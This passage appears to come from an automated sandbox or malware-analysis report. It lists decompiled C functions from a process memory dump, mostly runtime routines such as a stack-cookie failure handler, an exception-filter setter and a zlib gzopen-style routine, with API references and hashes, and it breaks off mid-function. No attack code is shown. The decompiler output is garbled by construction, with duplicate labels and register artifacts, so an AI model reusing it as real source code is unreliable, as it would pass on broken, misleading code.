                                                                                                                        				intOrPtr* _t31;
                                                                                                                        				void* _t34;
                                                                                                                        
                                                                                                                        				_t27 = __esi;
                                                                                                                        				_t26 = __edi;
                                                                                                                        				_t25 = __edx;
                                                                                                                        				_t22 = __ecx;
                                                                                                                        				_t21 = __ebx;
                                                                                                                        				_t6 = __eax;
                                                                                                                        				_t34 = _t22 -  *0x4228b4; // 0xb87af74f
                                                                                                                        				if(_t34 == 0) {
                                                                                                                        					asm("repe ret");
                                                                                                                        				}
                                                                                                                        				 *0x423fa0 = _t6;
                                                                                                                        				 *0x423f9c = _t22;
                                                                                                                        				 *0x423f98 = _t25;
                                                                                                                        				 *0x423f94 = _t21;
                                                                                                                        				 *0x423f90 = _t27;
                                                                                                                        				 *0x423f8c = _t26;
                                                                                                                        				 *0x423fb8 = ss;
                                                                                                                        				 *0x423fac = cs;
                                                                                                                        				 *0x423f88 = ds;
                                                                                                                        				 *0x423f84 = es;
                                                                                                                        				 *0x423f80 = fs;
                                                                                                                        				 *0x423f7c = gs;
                                                                                                                        				asm("pushfd");
                                                                                                                        				_pop( *0x423fb0);
                                                                                                                        				 *0x423fa4 =  *_t31;
                                                                                                                        				 *0x423fa8 = _v0;
                                                                                                                        				 *0x423fb4 =  &_a4;
                                                                                                                        				 *0x423ef0 = 0x10001;
                                                                                                                        				_t11 =  *0x423fa8; // 0x0
                                                                                                                        				 *0x423ea4 = _t11;
                                                                                                                        				 *0x423e98 = 0xc0000409;
                                                                                                                        				 *0x423e9c = 1;
                                                                                                                        				_t12 =  *0x4228b4; // 0xb87af74f
                                                                                                                        				_v812 = _t12;
                                                                                                                        				_t13 =  *0x4228b8; // 0x478508b0
                                                                                                                        				_v808 = _t13;
                                                                                                                        				 *0x423ee8 = IsDebuggerPresent();
                                                                                                                        				_push(1);
                                                                                                                        				E00416230(_t14);
                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                        				_t17 = UnhandledExceptionFilter(0x42039c);
                                                                                                                        				if( *0x423ee8 == 0) {
                                                                                                                        					_push(1);
                                                                                                                        					E00416230(_t17);
                                                                                                                        				}
                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                        			}



















                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c0b
                                                                                                                        0x00415c11
                                                                                                                        0x00415c13
                                                                                                                        0x00415c13
                                                                                                                        0x00418d35
                                                                                                                        0x00418d3a
                                                                                                                        0x00418d40
                                                                                                                        0x00418d46
                                                                                                                        0x00418d4c
                                                                                                                        0x00418d52
                                                                                                                        0x00418d58
                                                                                                                        0x00418d5f
                                                                                                                        0x00418d66
                                                                                                                        0x00418d6d
                                                                                                                        0x00418d74
                                                                                                                        0x00418d7b
                                                                                                                        0x00418d82
                                                                                                                        0x00418d83
                                                                                                                        0x00418d8c
                                                                                                                        0x00418d94
                                                                                                                        0x00418d9c
                                                                                                                        0x00418da7
                                                                                                                        0x00418db1
                                                                                                                        0x00418db6
                                                                                                                        0x00418dbb
                                                                                                                        0x00418dc5
                                                                                                                        0x00418dcf
                                                                                                                        0x00418dd4
                                                                                                                        0x00418dda
                                                                                                                        0x00418ddf
                                                                                                                        0x00418deb
                                                                                                                        0x00418df0
                                                                                                                        0x00418df2
                                                                                                                        0x00418dfa
                                                                                                                        0x00418e05
                                                                                                                        0x00418e12
                                                                                                                        0x00418e14
                                                                                                                        0x00418e16
                                                                                                                        0x00418e1b
                                                                                                                        0x00418e2f

                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00418DE5
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418DFA
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0042039C), ref: 00418E05
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E21
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00418E28
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 56316a485f7f49f80a122dd7e2d7825b1c7d3aabd412730b4c78653adcbd4640
                                                                                                                        • Instruction ID: c266609a22928a924db8473a7985c3b1ca08b1be84fc197e68db2b31327a9059
                                                                                                                        • Opcode Fuzzy Hash: 56316a485f7f49f80a122dd7e2d7825b1c7d3aabd412730b4c78653adcbd4640
                                                                                                                        • Instruction Fuzzy Hash: 5A21C5B4B10204EFD720DF14FA496857BB1FB1C316F92407AE40887360E7B896868F4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004154E1() {
                                                                                                                        
                                                                                                                        				SetUnhandledExceptionFilter(E0041549F);
                                                                                                                        				return 0;
                                                                                                                        			}



                                                                                                                        0x004154e6
                                                                                                                        0x004154ee

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001549F), ref: 004154E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 9d8b197145226623f431b53aaf42b2836c73555caff4a8fd8822d7c765ac5632
                                                                                                                        • Instruction ID: fd73bd039d4ba1dd9c7af2bdade5593518066e7e5ed1b3f7d656c54c6f944c5a
                                                                                                                        • Opcode Fuzzy Hash: 9d8b197145226623f431b53aaf42b2836c73555caff4a8fd8822d7c765ac5632
                                                                                                                        • Instruction Fuzzy Hash: F29002B82516409A469157706D0A7CA29919A8C61375144A56136C4064DBA441C4565E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 83%
                                                                                                                        			E00408980(intOrPtr* __eax) {
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr* _t57;
                                                                                                                        				char* _t60;
                                                                                                                        				char _t62;
                                                                                                                        				intOrPtr _t63;
                                                                                                                        				char _t64;
                                                                                                                        				intOrPtr _t65;
                                                                                                                        				intOrPtr _t66;
                                                                                                                        				intOrPtr _t67;
                                                                                                                        				intOrPtr _t69;
                                                                                                                        				intOrPtr _t70;
                                                                                                                        				intOrPtr _t74;
                                                                                                                        				intOrPtr _t79;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				intOrPtr* _t83;
                                                                                                                        				void* _t86;
                                                                                                                        				char* _t88;
                                                                                                                        				char* _t89;
                                                                                                                        				intOrPtr* _t91;
                                                                                                                        				intOrPtr* _t93;
                                                                                                                        				signed int _t97;
                                                                                                                        				signed int _t98;
                                                                                                                        				void* _t100;
                                                                                                                        				void* _t101;
                                                                                                                        				void* _t102;
                                                                                                                        				void* _t103;
                                                                                                                        				void* _t104;
                                                                                                                        
                                                                                                                        				_t98 = _t97 | 0xffffffff;
                                                                                                                        				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                        				_t91 = __eax;
                                                                                                                        				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                        				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t93 = E0040DFE9(0, _t86, __eax, 0x74);
                                                                                                                        					_t101 = _t100 + 4;
                                                                                                                        					if(_t93 == 0) {
                                                                                                                        						L31:
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                                                                        						 *_t93 = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                                                                        						 *(_t93 + 0x6c) = _t98;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x4c)) = E00406250(0, 0, 0);
                                                                                                                        						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                                                                        						_t102 = _t101 + 0xc;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                                                                        						_t87 = _t57 + 1;
                                                                                                                        						do {
                                                                                                                        							_t82 =  *_t57;
                                                                                                                        							_t57 = _t57 + 1;
                                                                                                                        						} while (_t82 != 0);
                                                                                                                        						_t60 = E0040DFE9(0, _t87, _t91, _t57 - _t87 + 1);
                                                                                                                        						_t103 = _t102 + 4;
                                                                                                                        						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                                                                        						if(_t60 == 0) {
                                                                                                                        							L30:
                                                                                                                        							E00408330(0, _t87, _t93);
                                                                                                                        							goto L31;
                                                                                                                        						} else {
                                                                                                                        							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                                                                        							_t88 = _t60;
                                                                                                                        							goto L7;
                                                                                                                        							L9:
                                                                                                                        							L9:
                                                                                                                        							if( *_t91 == 0x72) {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                                                                        							}
                                                                                                                        							_t63 =  *_t91;
                                                                                                                        							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                                                                        							}
                                                                                                                        							_t64 =  *_t91;
                                                                                                                        							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                                                                        								__eflags = _t64 - 0x66;
                                                                                                                        								if(_t64 != 0x66) {
                                                                                                                        									__eflags = _t64 - 0x68;
                                                                                                                        									if(_t64 != 0x68) {
                                                                                                                        										__eflags = _t64 - 0x52;
                                                                                                                        										if(_t64 != 0x52) {
                                                                                                                        											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                                                                        											 *_t89 = _t64;
                                                                                                                        											_t87 = _t89 + 1;
                                                                                                                        											__eflags = _t87;
                                                                                                                        											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                                                                        										} else {
                                                                                                                        											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								_t98 = _t64 - 0x30;
                                                                                                                        							}
                                                                                                                        							_t91 = _t91 + 1;
                                                                                                                        							if(_t64 == 0) {
                                                                                                                        								goto L26;
                                                                                                                        							}
                                                                                                                        							_t87 = _t103 + 0x68;
                                                                                                                        							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                                                                        								goto L9;
                                                                                                                        							}
                                                                                                                        							L26:
                                                                                                                        							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                                                                        							if(_t65 == 0) {
                                                                                                                        								goto L30;
                                                                                                                        							} else {
                                                                                                                        								if(_t65 != 0x77) {
                                                                                                                        									_t66 = E0040DFE9(0, _t87, _t91, 0x4000);
                                                                                                                        									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                                                                        									 *_t93 = _t66;
                                                                                                                        									_t67 = E0040A370(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                                                                        									_t104 = _t103 + 0x14;
                                                                                                                        									__eflags = _t67;
                                                                                                                        									if(_t67 != 0) {
                                                                                                                        										goto L30;
                                                                                                                        									} else {
                                                                                                                        										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                                                                        										if(__eflags == 0) {
                                                                                                                        											goto L30;
                                                                                                                        										} else {
                                                                                                                        											goto L34;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_push(0x38);
                                                                                                                        									_push("1.2.3");
                                                                                                                        									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                                                                        									_push(8);
                                                                                                                        									_push(0xfffffff1);
                                                                                                                        									_push(8);
                                                                                                                        									_push(_t98);
                                                                                                                        									_push(_t93);
                                                                                                                        									_t91 = E00407EB0();
                                                                                                                        									_t79 = E0040DFE9(0, _t87, _t91, 0x4000);
                                                                                                                        									_t104 = _t103 + 0x24;
                                                                                                                        									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                                                                        									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                                                                        									if(_t91 != 0 || _t79 == 0) {
                                                                                                                        										goto L30;
                                                                                                                        									} else {
                                                                                                                        										L34:
                                                                                                                        										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                                                                        										 *((intOrPtr*)(E0040F27B(__eflags))) = 0;
                                                                                                                        										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                        										__eflags = _t69;
                                                                                                                        										_push(_t104 + 0x18);
                                                                                                                        										if(__eflags >= 0) {
                                                                                                                        											_push(_t69);
                                                                                                                        											_t70 = E0040FC13(0, _t87, _t91, _t93, __eflags);
                                                                                                                        										} else {
                                                                                                                        											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                                                                        											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                                                                        											_t70 = E0040FE5D();
                                                                                                                        										}
                                                                                                                        										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                                                                        										__eflags = _t70;
                                                                                                                        										if(_t70 == 0) {
                                                                                                                        											goto L30;
                                                                                                                        										} else {
                                                                                                                        											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                                                                        											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                                                                        												E004081D0(_t93, 0);
                                                                                                                        												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                                                                        												_t74 = E0040FBA5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                                                                        												__eflags = _t74;
                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                                                                        												return _t93;
                                                                                                                        											} else {
                                                                                                                        												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                                                                        												return _t93;
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L42;
                                                                                                                        							L7:
                                                                                                                        							_t62 =  *_t83;
                                                                                                                        							 *_t88 = _t62;
                                                                                                                        							_t83 = _t83 + 1;
                                                                                                                        							_t88 = _t88 + 1;
                                                                                                                        							if(_t62 != 0) {
                                                                                                                        								goto L7;
                                                                                                                        							} else {
                                                                                                                        								 *((char*)(_t93 + 0x5c)) = 0;
                                                                                                                        							}
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L42:
                                                                                                                        			}

































                                                                                                                        0x00408987
                                                                                                                        0x0040898f
                                                                                                                        0x00408993
                                                                                                                        0x00408995
                                                                                                                        0x0040899d
                                                                                                                        0x00408b98
                                                                                                                        0x00408b9e
                                                                                                                        0x004089ab
                                                                                                                        0x004089b3
                                                                                                                        0x004089b5
                                                                                                                        0x004089ba
                                                                                                                        0x00408af1
                                                                                                                        0x00408afa
                                                                                                                        0x004089c0
                                                                                                                        0x004089c3
                                                                                                                        0x004089c6
                                                                                                                        0x004089c9
                                                                                                                        0x004089cc
                                                                                                                        0x004089cf
                                                                                                                        0x004089d1
                                                                                                                        0x004089d4
                                                                                                                        0x004089d7
                                                                                                                        0x004089da
                                                                                                                        0x004089dd
                                                                                                                        0x004089e0
                                                                                                                        0x004089e3
                                                                                                                        0x004089e6
                                                                                                                        0x004089e9
                                                                                                                        0x004089ec
                                                                                                                        0x004089f4
                                                                                                                        0x004089f7
                                                                                                                        0x004089fb
                                                                                                                        0x004089fe
                                                                                                                        0x00408a01
                                                                                                                        0x00408a04
                                                                                                                        0x00408a07
                                                                                                                        0x00408a07
                                                                                                                        0x00408a09
                                                                                                                        0x00408a0a
                                                                                                                        0x00408a12
                                                                                                                        0x00408a17
                                                                                                                        0x00408a1a
                                                                                                                        0x00408a1f
                                                                                                                        0x00408aec
                                                                                                                        0x00408aec
                                                                                                                        0x00000000
                                                                                                                        0x00408a25
                                                                                                                        0x00408a25
                                                                                                                        0x00408a29
                                                                                                                        0x00408a2b
                                                                                                                        0x00000000
                                                                                                                        0x00408a40
                                                                                                                        0x00408a42
                                                                                                                        0x00408a44
                                                                                                                        0x00408a44
                                                                                                                        0x00408a47
                                                                                                                        0x00408a4b
                                                                                                                        0x00408a51
                                                                                                                        0x00408a51
                                                                                                                        0x00408a55
                                                                                                                        0x00408a59
                                                                                                                        0x00408a67
                                                                                                                        0x00408a69
                                                                                                                        0x00408a75
                                                                                                                        0x00408a77
                                                                                                                        0x00408a83
                                                                                                                        0x00408a85
                                                                                                                        0x00408a91
                                                                                                                        0x00408a95
                                                                                                                        0x00408a97
                                                                                                                        0x00408a97
                                                                                                                        0x00408a98
                                                                                                                        0x00408a87
                                                                                                                        0x00408a87
                                                                                                                        0x00408a87
                                                                                                                        0x00408a79
                                                                                                                        0x00408a79
                                                                                                                        0x00408a79
                                                                                                                        0x00408a6b
                                                                                                                        0x00408a6b
                                                                                                                        0x00408a6b
                                                                                                                        0x00408a5f
                                                                                                                        0x00408a62
                                                                                                                        0x00408a62
                                                                                                                        0x00408a9c
                                                                                                                        0x00408a9f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408aa1
                                                                                                                        0x00408aa9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408aab
                                                                                                                        0x00408aab
                                                                                                                        0x00408ab0
                                                                                                                        0x00000000
                                                                                                                        0x00408ab2
                                                                                                                        0x00408ab4
                                                                                                                        0x00408b00
                                                                                                                        0x00408b0f
                                                                                                                        0x00408b12
                                                                                                                        0x00408b14
                                                                                                                        0x00408b19
                                                                                                                        0x00408b1c
                                                                                                                        0x00408b1e
                                                                                                                        0x00000000
                                                                                                                        0x00408b20
                                                                                                                        0x00408b20
                                                                                                                        0x00408b23
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00408b23
                                                                                                                        0x00408ab6
                                                                                                                        0x00408aba
                                                                                                                        0x00408abc
                                                                                                                        0x00408ac1
                                                                                                                        0x00408ac2
                                                                                                                        0x00408ac4
                                                                                                                        0x00408ac6
                                                                                                                        0x00408ac8
                                                                                                                        0x00408ac9
                                                                                                                        0x00408ad4
                                                                                                                        0x00408ad6
                                                                                                                        0x00408adb
                                                                                                                        0x00408ade
                                                                                                                        0x00408ae1
                                                                                                                        0x00408ae6
                                                                                                                        0x00000000
                                                                                                                        0x00408b25
                                                                                                                        0x00408b25
                                                                                                                        0x00408b25
                                                                                                                        0x00408b31
                                                                                                                        0x00408b33
                                                                                                                        0x00408b37
                                                                                                                        0x00408b3d
                                                                                                                        0x00408b3e
                                                                                                                        0x00408b4c
                                                                                                                        0x00408b4d
                                                                                                                        0x00408b40
                                                                                                                        0x00408b40
                                                                                                                        0x00408b44
                                                                                                                        0x00408b45
                                                                                                                        0x00408b45
                                                                                                                        0x00408b55
                                                                                                                        0x00408b58
                                                                                                                        0x00408b5a
                                                                                                                        0x00000000
                                                                                                                        0x00408b5c
                                                                                                                        0x00408b5c
                                                                                                                        0x00408b60
                                                                                                                        0x00408b75
                                                                                                                        0x00408b7d
                                                                                                                        0x00408b86
                                                                                                                        0x00408b86
                                                                                                                        0x00408b89
                                                                                                                        0x00408b95
                                                                                                                        0x00408b62
                                                                                                                        0x00408b62
                                                                                                                        0x00408b72
                                                                                                                        0x00408b72
                                                                                                                        0x00408b60
                                                                                                                        0x00408b5a
                                                                                                                        0x00408ae6
                                                                                                                        0x00408ab4
                                                                                                                        0x00000000
                                                                                                                        0x00408a30
                                                                                                                        0x00408a30
                                                                                                                        0x00408a32
                                                                                                                        0x00408a34
                                                                                                                        0x00408a35
                                                                                                                        0x00408a38
                                                                                                                        0x00000000
                                                                                                                        0x00408a3a
                                                                                                                        0x00408a3a
                                                                                                                        0x00408a3d
                                                                                                                        0x00000000
                                                                                                                        0x00408a38
                                                                                                                        0x00408a1f
                                                                                                                        0x004089ba
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004089AE
                                                                                                                          • Part of subcall function 0040DFE9: __FF_MSGBANNER.LIBCMT ref: 0040E00C
                                                                                                                          • Part of subcall function 0040DFE9: __NMSG_WRITE.LIBCMT ref: 0040E013
                                                                                                                          • Part of subcall function 0040DFE9: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00414D74,00000001,00000001,00000001,?,004101FE,00000018,00421158,0000000C,0041028F), ref: 0040E060
                                                                                                                        • _malloc.LIBCMT ref: 00408A12
                                                                                                                        • _malloc.LIBCMT ref: 00408AD6
                                                                                                                        • _malloc.LIBCMT ref: 00408B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.613517029.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.613580221.0000000000458000.00000040.00000001.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                        • String ID: 1.2.3
                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                        • Opcode ID: c1f364bdd0f5c54ca334afac39b52f0f8f4ae775d7ba898e351bec9349bfe9d0
                                                                                                                        • Instruction ID: e578efffc4446aa315e86bee8c4688169254dd15cbb8675e7868d0af5d0618d3
                                                                                                                        • Opcode Fuzzy Hash: c1f364bdd0f5c54ca334afac39b52f0f8f4ae775d7ba898e351bec9349bfe9d0
                                                                                                                        • Instruction Fuzzy Hash: 36612670A447418FC7309F69898062BFBE0BB55314F504D3FE1C6A3B81DB79A44A8F5A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E0040EF7C(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                                                        				signed int _v8;
                                                                                                                        				char* _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				signed int _v20;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				signed int _t90;
                                                                                                                        				intOrPtr* _t92;
                                                                                                                        				signed int _t94;
                                                                                                                        				char _t97;
                                                                                                                        				signed int _t105;
                                                                                                                        				void* _t106;
                                                                                                                        				signed int _t107;
                                                                                                                        				signed int _t110;
                                                                                                                        				signed int _t113;
                                                                                                                        				intOrPtr* _t114;
                                                                                                                        				signed int _t118;
                                                                                                                        				signed int _t119;
                                                                                                                        				signed int _t120;
                                                                                                                        				char* _t121;
                                                                                                                        				signed int _t125;
                                                                                                                        				signed int _t131;
                                                                                                                        				signed int _t133;
                                                                                                                        				void* _t134;
                                                                                                                        
                                                                                                                        				_t125 = __edx;
                                                                                                                        				_t121 = _a4;
                                                                                                                        				_t119 = _a8;
                                                                                                                        				_t131 = 0;
                                                                                                                        				_v12 = _t121;
                                                                                                                        				_v8 = _t119;
                                                                                                                        				if(_a12 == 0 || _a16 == 0) {
                                                                                                                        					L5:
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t138 = _t121;
                                                                                                                        					if(_t121 != 0) {
                                                                                                                        						_t133 = _a20;
                                                                                                                        						__eflags = _t133;
                                                                                                                        						if(_t133 == 0) {
                                                                                                                        							L9:
                                                                                                                        							__eflags = _t119 - 0xffffffff;
                                                                                                                        							if(_t119 != 0xffffffff) {
                                                                                                                        								_t90 = E0040E430(_t131, _t121, _t131, _t119);
                                                                                                                        								_t134 = _t134 + 0xc;
                                                                                                                        							}
                                                                                                                        							__eflags = _t133 - _t131;
                                                                                                                        							if(__eflags == 0) {
                                                                                                                        								goto L3;
                                                                                                                        							} else {
                                                                                                                        								_t94 = _t90 | 0xffffffff;
                                                                                                                        								_t125 = _t94 % _a12;
                                                                                                                        								__eflags = _a16 - _t94 / _a12;
                                                                                                                        								if(__eflags > 0) {
                                                                                                                        									goto L3;
                                                                                                                        								}
                                                                                                                        								L13:
                                                                                                                        								_t131 = _a12 * _a16;
                                                                                                                        								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                        								_v20 = _t131;
                                                                                                                        								_t120 = _t131;
                                                                                                                        								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        									_v16 = 0x1000;
                                                                                                                        								} else {
                                                                                                                        									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                        								}
                                                                                                                        								__eflags = _t131;
                                                                                                                        								if(_t131 == 0) {
                                                                                                                        									L40:
                                                                                                                        									return _a16;
                                                                                                                        								} else {
                                                                                                                        									do {
                                                                                                                        										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                        										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                        											L24:
                                                                                                                        											__eflags = _t120 - _v16;
                                                                                                                        											if(_t120 < _v16) {
                                                                                                                        												_t97 = E00412CF5(_t120, _t125, _t133);
                                                                                                                        												__eflags = _t97 - 0xffffffff;
                                                                                                                        												if(_t97 == 0xffffffff) {
                                                                                                                        													L48:
                                                                                                                        													return (_t131 - _t120) / _a12;
                                                                                                                        												}
                                                                                                                        												__eflags = _v8;
                                                                                                                        												if(_v8 == 0) {
                                                                                                                        													L44:
                                                                                                                        													__eflags = _a8 - 0xffffffff;
                                                                                                                        													if(__eflags != 0) {
                                                                                                                        														E0040E430(_t131, _a4, 0, _a8);
                                                                                                                        														_t134 = _t134 + 0xc;
                                                                                                                        													}
                                                                                                                        													 *((intOrPtr*)(E0040F27B(__eflags))) = 0x22;
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													_push(0);
                                                                                                                        													L4:
                                                                                                                        													E00411AE6(_t125, _t131, _t133);
                                                                                                                        													goto L5;
                                                                                                                        												}
                                                                                                                        												_t123 = _v12;
                                                                                                                        												_v12 = _v12 + 1;
                                                                                                                        												 *_v12 = _t97;
                                                                                                                        												_t120 = _t120 - 1;
                                                                                                                        												_t70 =  &_v8;
                                                                                                                        												 *_t70 = _v8 - 1;
                                                                                                                        												__eflags =  *_t70;
                                                                                                                        												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                        												goto L39;
                                                                                                                        											}
                                                                                                                        											__eflags = _v16;
                                                                                                                        											if(_v16 == 0) {
                                                                                                                        												_t105 = 0x7fffffff;
                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                        													_t105 = _t120;
                                                                                                                        												}
                                                                                                                        											} else {
                                                                                                                        												__eflags = _t120 - 0x7fffffff;
                                                                                                                        												if(_t120 <= 0x7fffffff) {
                                                                                                                        													_t55 = _t120 % _v16;
                                                                                                                        													__eflags = _t55;
                                                                                                                        													_t125 = _t55;
                                                                                                                        													_t110 = _t120;
                                                                                                                        												} else {
                                                                                                                        													_t125 = 0x7fffffff % _v16;
                                                                                                                        													_t110 = 0x7fffffff;
                                                                                                                        												}
                                                                                                                        												_t105 = _t110 - _t125;
                                                                                                                        											}
                                                                                                                        											__eflags = _t105 - _v8;
                                                                                                                        											if(_t105 > _v8) {
                                                                                                                        												goto L44;
                                                                                                                        											} else {
                                                                                                                        												_push(_t105);
                                                                                                                        												_push(_v12);
                                                                                                                        												_t106 = E00412CC3(_t125, _t131, _t133);
                                                                                                                        												_pop(_t123);
                                                                                                                        												_push(_t106);
                                                                                                                        												_t107 = E004133E2(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                        												_t134 = _t134 + 0xc;
                                                                                                                        												__eflags = _t107;
                                                                                                                        												if(_t107 == 0) {
                                                                                                                        													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												__eflags = _t107 - 0xffffffff;
                                                                                                                        												if(_t107 == 0xffffffff) {
